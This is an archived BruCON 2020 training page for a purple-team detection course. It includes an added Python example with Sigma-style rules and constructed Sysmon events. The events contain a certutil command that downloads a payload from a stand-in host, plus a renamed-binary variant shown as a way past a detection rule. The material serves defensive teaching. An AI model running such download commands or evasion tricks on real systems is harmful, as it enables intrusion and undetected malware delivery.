<h1>In &amp; Out – Detection as Code vs Adversary Simulations – Purple Edition</h1>
<p>BruCON 2020 training page. Published 2020-08-14, last modified 2020-08-17. Original page: <a href="https://archive.brucon.org/2020/brucon-2020-training/in-out-detection-as-code-vs-adversary-simulations-purple-edition/">https://archive.brucon.org/2020/brucon-2020-training/in-out-detection-as-code-vs-adversary-simulations-purple-edition/</a></p>
<h2>Course Description</h2>
<p>In &amp; Out – Detection as Code vs Adversary Simulations – Purple Edition is an advanced, lab-based training created to present participants with:</p>
<ul>
<li>The significance of correlating security events, including context, to reduce the number of false positives and better detect adversary activity</li>
<li>Advanced detection methods and techniques against exfiltration and lateral movement, including event mapping, grouping and tagging</li>
<li>The tactics and behaviours of an adversary after gaining initial access to the network (Linux / Windows)</li>
<li>Detection methods for C2 traffic, tunnelling, hiding, pivoting and custom, simulated malicious network events</li>
<li>The capabilities of many popular open-source tools and their integration with third-party security (IDS / IPS / WAF / EDR / FPC) and analytics solutions against adversaries' C2-based actions</li>
<li>Verification methods and techniques for product and service providers in the IT security space, in terms of internal testing and PoC / PoV programmes</li>
</ul>
<p>The primary goal of this training is to generate offensive attack events and symptoms within the PurpleLABS infrastructure that should later be detected by an open-source SOC stack, including Sigma (the open, generic signature format for describing log events) and the rest of the dedicated open-source security solutions in use. In this way participants thoroughly familiarise themselves with the content and structure of the available Sigma detection rules, better understand the essence of offensive actions, learn the low-level relationships between data sources, and so gain the knowledge to create their own detection rules and, eventually, to bypass them. We call this approach 'Flip mode': learning detection through the attack, in an attractive, standardised form driven by the open-source community. In addition, participants use a whole range of open-source (and free commercial) solutions dedicated to SOC environments.</p>
<p>We believe that the unique 'Detection as Code vs Adversary Simulations' approach, in a condensed format, will raise the level of RED / BLUE / PURPLE knowledge of both experienced specialists and beginners while keeping the tasks attractive and enjoyable: detection does not have to be boring and tedious!</p>
<h4>Virtual infrastructure</h4>
<p>This training is based on <em>PurpleLABS</em>, a dedicated virtual infrastructure for detecting and analysing attackers' behaviour in terms of the techniques, tactics, procedures and offensive tools they use.</p>
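<p>To make the 'Flip mode' loop concrete (attack event → telemetry → rule → detection → bypass), here is an added example that is not part of the course material and not a rule from the SigmaHQ repository: two Sigma-style rules for a certutil download, written as Python dicts that mirror Sigma's YAML layout (logsource, named selections, condition), a matcher covering a subset of Sigma (the contains / startswith / endswith / all modifiers and and / or / not conditions; no wildcards, regex or aggregations), and three constructed Sysmon Event ID 1 records. The third record is the attacker's bypass of the first rule: certutil.exe copied under another name, which an Image-only selection never sees but an OriginalFileName selection still catches, because Sysmon records that field from the PE version resource. The paths, the 10.0.0.5 host, the event ids and the rule titles are assumptions made for the example.</p>

```python
"""Sigma-style detection as code: rules, constructed Sysmon events, a matcher.

Added illustration of the 'Flip mode' loop; the rules mirror Sigma's YAML layout
but are written for this example (not SigmaHQ rules). Events, hosts and paths
are constructed. Only a subset of Sigma is implemented: contains / startswith /
endswith / all modifiers and and / or / not conditions.
"""

# Rule 1: the obvious signature, keyed on the image name only.
RULE_IMAGE_ONLY = {
    "title": "Certutil download via urlcache (image name only)",  # assumed title
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {"Image|endswith": "\\certutil.exe"},
        "selection_cli": {"CommandLine|contains|all": ["urlcache", "http"]},
        "condition": "selection_img and selection_cli",
    },
    "tags": ["attack.command_and_control", "attack.t1105"],
}

# Rule 2: also keyed on OriginalFileName, which Sysmon takes from the PE version
# resource, so it survives the attacker renaming the binary.
RULE_WITH_ORIGINAL_NAME = {
    "title": "Certutil download via urlcache (image or OriginalFileName)",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "selection_img": {"Image|endswith": "\\certutil.exe"},
        "selection_orig": {"OriginalFileName": "CertUtil.exe"},
        "selection_cli": {"CommandLine|contains|all": ["urlcache", "http"]},
        "condition": "(selection_img or selection_orig) and selection_cli",
    },
    "tags": ["attack.command_and_control", "attack.t1105"],
}

# Constructed Sysmon Event ID 1 (process creation) records, flattened to
# field/value maps the way a SIEM presents them. The "id" key is ours.
EVENTS = [
    {"id": "download", "EventID": 1,
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://10.0.0.5/a.exe C:\\Users\\Public\\a.exe"},
    {"id": "benign", "EventID": 1,
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -dump C:\\Temp\\cert.cer"},
    # The bypass: certutil.exe copied to a new name; Image no longer matches.
    {"id": "renamed", "EventID": 1,
     "Image": "C:\\Users\\Public\\svchost.exe",
     "OriginalFileName": "CertUtil.exe",
     "CommandLine": "svchost.exe -URLCache -split -f http://10.0.0.5/a.exe C:\\Users\\Public\\a.exe"},
]


def _match_value(field_value, pattern, modifiers):
    """Compare one event field with one pattern; Sigma string matching is case-insensitive."""
    if field_value is None:
        return False
    haystack, needle = str(field_value).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return needle in haystack
    if "startswith" in modifiers:
        return haystack.startswith(needle)
    if "endswith" in modifiers:
        return haystack.endswith(needle)
    return haystack == needle


def _match_selection(selection, event):
    """Every field in a selection must match; list values are OR-ed unless |all is set."""
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        values = patterns if isinstance(patterns, list) else [patterns]
        hits = [_match_value(event.get(field), v, modifiers) for v in values]
        if not (all(hits) if "all" in modifiers else any(hits)):
            return False
    return True


def rule_matches(rule, event):
    """Evaluate each named selection, then the rule's boolean condition over them."""
    detection = rule["detection"]
    results = {name: _match_selection(sel, event)
               for name, sel in detection.items() if name != "condition"}
    # Sigma's and/or/not condition syntax is valid Python boolean syntax, so a
    # builtins-free eval over the selection results covers this subset.
    return bool(eval(detection["condition"], {"__builtins__": {}}, results))


def detect(rule, events):
    """Return the ids of the events a rule fires on."""
    return [e["id"] for e in events if rule_matches(rule, e)]


if __name__ == "__main__":
    for rule in (RULE_IMAGE_ONLY, RULE_WITH_ORIGINAL_NAME):
        print(f"{rule['title']}: {detect(rule, EVENTS)}")
```

<p>Run it and the first rule fires only on the <code>download</code> event, while the second also fires on <code>renamed</code>; the benign <code>certutil -dump</code> invocation matches neither. That is the whole 'Flip mode' cycle in one file: write the rule, generate the event, watch it fire, find the variant that does not, and widen the rule with a second data field. The <code>eval</code> sees nothing but the selection results and should only ever be fed conditions from rule files you control.</p>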
<p>The environment has been set up to serve the constant improvement of competences in threat hunting and to keep up with current trends in offensive actions (red teaming) versus the detection phases (blue teaming).</p>
<p>PurpleLABS provides analytical interfaces for all relevant data sources from the individual systems and network services available in the virtual infrastructure (Sysmon, Windows events, firewall, Bro/Zeek, Suricata, FPC, osquery, auth, PowerShell, WAF, proxy, audit and more).</p>
<p><em>This means you also get the chance to do *bonus* detection and hunting steps against all the offensive labs available during the training. Best of all, after the training you receive an additional 14 days of access to PurpleLABS. Take a look: <a href="https://www.defensive-security.com/purplelabs/">https://www.defensive-security.com/purplelabs/</a></em></p>
<h4>Key Learning Objectives</h4>
<ul>
<li>Learn ways to improve your detection and event-correlation skills across many different data sources</li>
<li>Find malicious activities and identify threat details on the network</li>
<li>Prepare your SOC team to filter out network noise quickly and handle incident response better</li>
<li>Profile your critical OS and network segments in terms of 'normal vs exotic' behaviour</li>
<li>Find out how open-source DFIR / IR software can support your SIEM infrastructure</li>
<li>Learn current trends, techniques and tools for network exfiltration and lateral movement</li>
<li>Understand the value of DLP / IDS / IPS / FW / WAF / memory forensics against real adversary lab scenarios</li>
<li>Understand the value of an automated approach to simulating attackers and generating anomalies</li>
<li>Identify blind spots in your network security posture</li>
</ul>
<p><em>If that is what you are after, then this training is for you!</em></p>
<h2>Course contents</h2>
<p><strong>Introduction to adversary simulations and open-source attack emulation projects:</strong></p>
<ul>
<li>Atomic Red Team</li>
<li>PurpleSharp</li>
<li>RTA</li>
<li>APT Simulator</li>
<li>DumpsterFire</li>
<li>Firebolt</li>
<li>Flightsim</li>
<li>BYOB</li>
<li>Metta</li>
<li>Infection Monkey</li>
<li>Caldera and more</li>
</ul>
<p><strong>PCAP exfiltration CTF-style challenge</strong></p>
<p><strong>MITRE ATT&amp;CK framework &amp; Sigma rules → a detection map based on recent examples of chained attack scenarios</strong></p>
<p><strong>Finding malicious artifacts using YARA, ssdeep, Volatility and memtriage:</strong></p>
<ul>
<li>How YARA works and why it could be your best friend</li>
<li>yarascan + Volatility Framework</li>
<li>memtriage</li>
<li>YARA vs webshells</li>
</ul>
<p><strong>Collecting, analysing and correlating data from different data sources using:</strong></p>
<ul>
<li>Splunk</li>
<li>HELK (Hunting ELK)</li>
<li>Wazuh</li>
<li>Graylog</li>
<li>NetFlow</li>
<li>Zeek IDS</li>
<li>Suricata IDS</li>
<li>Moloch</li>
<li>auditd / go-audit</li>
<li>eBPF</li>
<li>osquery</li>
<li>Velociraptor</li>
</ul>
<p><strong>Windows Sysinternals Suite:</strong></p>
<ul>
<li>Sysmon:
<ul>
<li>Process execution events</li>
<li>Network connection events</li>
<li>Image load events</li>
<li>Named pipe events</li>
<li>WMI events</li>
<li>PsExec events</li>
</ul>
</li>
<li>Process Explorer</li>
<li>Process Monitor</li>
<li>Autoruns</li>
<li>Evidence traces of file download and execution:
<ul>
<li>cmd.exe</li>
<li>HTA</li>
<li>JS</li>
<li>VBS</li>
<li>WSF</li>
<li>JSE</li>
<li>C#</li>
<li>certutil</li>
<li>PowerShell</li>
<li>bitsadmin</li>
</ul>
</li>
<li>Shellcode injection techniques</li>
<li>WebDAV / SMB / NFS share mapping</li>
</ul>
<p><strong>Low-level Linux security tracing and profiling for critical services:</strong></p>
<ul>
<li>eBPF</li>
<li>sysdig</li>
</ul>
<p><strong>Playing with Zeek IDS / Suricata IDS for anomaly detection → finding malicious artifacts at the network level:</strong></p>
<ul>
<li>The importance of a network baseline for high-risk environments</li>
<li>Virtual SPAN / TAP and NetFlow → Open vSwitch</li>
<li>Feature definition and extraction</li>
<li>bro-cut syntax</li>
<li>Bro script index</li>
<li>Client / server fingerprinting:
<ul>
<li>JA3</li>
<li>HASSH</li>
</ul>
</li>
<li>Security feature extraction across many different network protocols</li>
</ul>
<p><strong>Detection and traces of C2 and network exfiltration techniques → use cases:</strong></p>
<ul>
<li>ICMP</li>
<li>TCP / UDP</li>
<li>SSL / TLS</li>
<li>DNS / DoH / DGA / anomalies</li>
<li>HTTP / HTTP/2 / QUIC</li>
<li>LDAP exfiltration</li>
<li>Dropbox / Twitter / Google / Mozilla / Discord / Slack</li>
<li>SMB bind named pipes</li>
<li>Legitimate website covert channel</li>
<li>Intelligent HTTP C2 redirection</li>
<li>Port knocking</li>
<li>Domain fronting</li>
<li>ngrok / shooter</li>
<li>Egress testing and common network traffic on non-standard ports</li>
</ul>
<p><strong>Detection and traces of C2 post-exploitation and lateral movement → use cases:</strong></p>
<ul>
<li>AD reconnaissance / AD snapshot</li>
<li>BloodHound artifacts</li>
<li>Golden Ticket</li>
<li>Silver Ticket</li>
<li>Kerberoasting</li>
<li>RPC over TCP/IP</li>
<li>DCSync / DCShadow</li>
<li>Mimikatz agent / server</li>
<li>Pass the Hash</li>
<li>smbexec</li>
<li>Invoke-WMI</li>
<li>WinRM</li>
<li>Invoke-PsExec</li>
<li>PSRemoting</li>
<li>RDP wrapping</li>
<li>Offensive PowerShell:
<ul>
<li>WMI multiple sessions</li>
<li>Remote network relaying</li>
<li>Copying VSS</li>
<li>Keylogging</li>
<li>LSA secrets extraction</li>
<li>Sandbox / virtual environment detection</li>
<li>UAC bypassing</li>
<li>Poisoning LLMNR, NBT-NS, mDNS, WPAD and WSUS</li>
<li>SMB ransomware detection</li>
<li>Browser pivoting</li>
<li>SSH tunnelling and pivoting</li>
<li>RDP tunnelling and pivoting / RDP Inception</li>
</ul>
</li>
</ul>
<p><strong>Detection of brute-force attacks → use cases:</strong></p>
<ul>
<li>SQL</li>
<li>AD / Kerberos</li>
<li>SSH</li>
<li>Web apps</li>
</ul>
<p><strong>Windows malware persistence methods:</strong></p>
<ul>
<li>Services</li>
<li>Winlogon registry entries</li>
<li>Run / RunOnce</li>
<li>Scheduled tasks</li>
<li>Startup folder</li>
<li>WMI</li>
<li>DLL</li>
</ul>
<p><strong>Linux malware persistence methods:</strong></p>
<ul>
<li>Services</li>
<li>Startup scripts</li>
<li>SSH magic password</li>
<li>Port knocking / iptables</li>
<li>Kernel modules</li>
</ul>
<p><strong>Describing relevant log events in a generic, open signature format → writing Sigma rules for:</strong></p>
<ul>
<li>Application</li>
<li>APT</li>
<li>Linux</li>
<li>Network</li>
<li>Proxy</li>
<li>Web</li>
<li>Windows</li>
</ul>
<h2>Who should take this course?</h2>
<ul>
<li>Red and Blue team members</li>
<li>Security / data analysts</li>
<li>CIRT / incident response specialists</li>
<li>Network security engineers</li>
<li>SOC members and SIEM engineers</li>
<li>AI / machine learning developers</li>
<li>Chief Security Officers and IT security directors</li>
</ul>
<h2>Requirements</h2>
<ul>
<li>Intermediate command-line experience on Linux and Windows</li>
<li>Fundamental knowledge of TCP/IP network protocols</li>
<li>Penetration-testing experience performing enumeration, exploitation and lateral movement is beneficial, but not required</li>
<li>Basic programming skills are a plus, but not essential</li>
</ul>
<h4>Hardware / Software Requirements</h4>
<ul>
<li>A VPN client installed according to the VPN setup instructions</li>
<li>A Slack account; an invite to a dedicated training channel will be sent</li>
<li>A stable internet connection</li>
<li>Recommended:
<ul>
<li>Zoom client installed</li>
<li>An HD camera, for 1:1 access to the instructor and the other participants. Even virtually, let's feel like we are in the same classroom :)</li>
</ul>
</li>
</ul>
<p><strong>Comment:</strong> <em>This training runs on dedicated PurpleLABS cloud infrastructure, so there are no special requirements for the student's desktop. No more initial setup issues, just a pure training experience!</em></p>
<h2>Trainer Biography</h2>
<p><strong>Leszek Miś</strong> is the Founder of Defensive Security (<a href="http://www.defensive-security.com">www.defensive-security.com</a>), Principal Trainer and Security Researcher with over 16 years of experience in the cyber security and open-source security solutions market. He has gone through the full path of infosec career positions: from OSS researcher, Linux administrator, system developer and DevOps, through penetration tester and security consultant delivering hardening services and training for the biggest players in the European and global market, to finally become an IT Security Architect / SOC Security Analyst with a deep, vendor-neutral focus on network security attack and detection. He has deep knowledge of finding blind spots and security gaps in corporate environments, and a thorough understanding of the technical and business value of delivering a structured, automated adversary simulation platform.</p>
<p>Recognised speaker and trainer at: BruCON 2017/2018, Black Hat USA 2019, OWASP AppSec US 2018, FloCon USA 2018, Hack In The Box Dubai / Amsterdam / Singapore / Abu Dhabi 2018/2019/2020, 44CON UK 2019, Confidence PL, PLNOG, Open Source Day PL, Secure PL, Advanced Threat Summit PL</p>
<p>Member of the OWASP Poland Chapter.</p>
<p>Author of many IT security trainings:</p>
<ul>
<li>Open Source Defensive Security → The Trinity of Tactics for Defenders</li>
<li>In &amp; Out → Network Exfiltration and Post-Exploitation Techniques [RED EDITION]</li>
<li>In &amp; Out → Detection of Network Exfiltration and Post-Exploitation Techniques [BLUE EDITION]</li>
<li>System Internals – Network, OS and Memory Forensics</li>
<li>SELinux → Development &amp; Administration of Mandatory Access Control Policy</li>
<li>Advanced RHEL/CentOS Defensive Security &amp; Hardening</li>
<li>ModSecurity → Development and Management of Web Application Firewall rules</li>
<li>FreeIPA → Identity Management for Linux Domain Environments &amp; Trusts</li>
</ul>
<p>Holds many certifications: OSCP, RHCA, RHCSS, Splunk Certified Architect.</p>
<p>His areas of interest include network "feature" extraction, OS internals and forensics. He constantly tries to figure out what the AI/ML network security vendors are really selling. In his free time he likes to break into the "IoT world" just for fun. Still learning hard every single day.</p>
<h2>Social Media</h2>
<p>Twitter: <a href="https://twitter.com/cr0nym">@cr0nym</a></p>
<p>Blog: <a href="https://www.defensive-security.com">https://www.defensive-security.com</a></p>
<p>Training tickets: <a href="https://brucon0x0c-training.eventbrite.co.uk">Buy Training Ticket</a></p>